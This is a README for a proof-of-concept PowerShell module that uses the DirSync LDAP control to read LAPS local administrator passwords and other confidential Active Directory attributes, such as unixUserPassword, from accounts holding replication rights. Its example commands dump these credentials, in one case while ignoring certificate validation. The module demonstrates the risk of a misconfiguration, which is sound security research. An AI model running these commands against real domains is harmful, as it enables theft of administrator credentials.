DirSync is a simple proof of concept PowerShell module to demonstrate the impact of delegating DS-Replication-Get-Changes and DS-Replication-Get-Changes-In-Filtered-Set.
DS-Replication-Get-Changesallows to read the value of confidential attributes.DS-Replication-Get-Changes-In-Filtered-Set, coupled withDS-Replication-Get-Changes, allows to read the value of confidential and Read-Only Domain Controller (RODC) filtered attributes, such as Local Administrator Password Solution's (LAPS)ms-Mcs-AdmPwd.
See technical details at https://simondotsh.com/infosec/2022/07/11/dirsync.html.
Import-Module .\DirSync.psm1
Uses the DirSync LDAP control to synchronize Legacy Microsoft LAPS' attribute ms-Mcs-AdmPwd and Windows LAPS' msLAPS-Password. Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-In-Filtered-Set.
Sync-LAPS
Sync-LAPS -Server dc.contoso.com -Username Administrator -Password Password1$ -Domain contoso.com
Sync-LAPS -LDAPFilter '(samaccountname=workstation01$)'
Synchronize the LAPS password of all computer accounts over LDAPS, and ignore certificate validation.
Sync-LAPS -UseLDAPS -IgnoreCert
Uses the DirSync LDAP control to synchronize any requested attribute(s), namely confidential and RODC filtered ones. Requires DS-Replication-Get-Changes-In-Filtered-Set and/or DS-Replication-Get-Changes depending on the attribute.
The usage is identical to Sync-LAPS, except it requires-LDAPFilter and -Attributes.
Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword
Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword,description
Thank you to @marcan2020 for his usual code reviews.
See the LICENSE file for legal wording. Essentially it is MIT, meaning that I cannot be held responsible for whatever results from using this code, and do not offer any warranty. By agreeing to this, you are free to use and do anything you like with the code.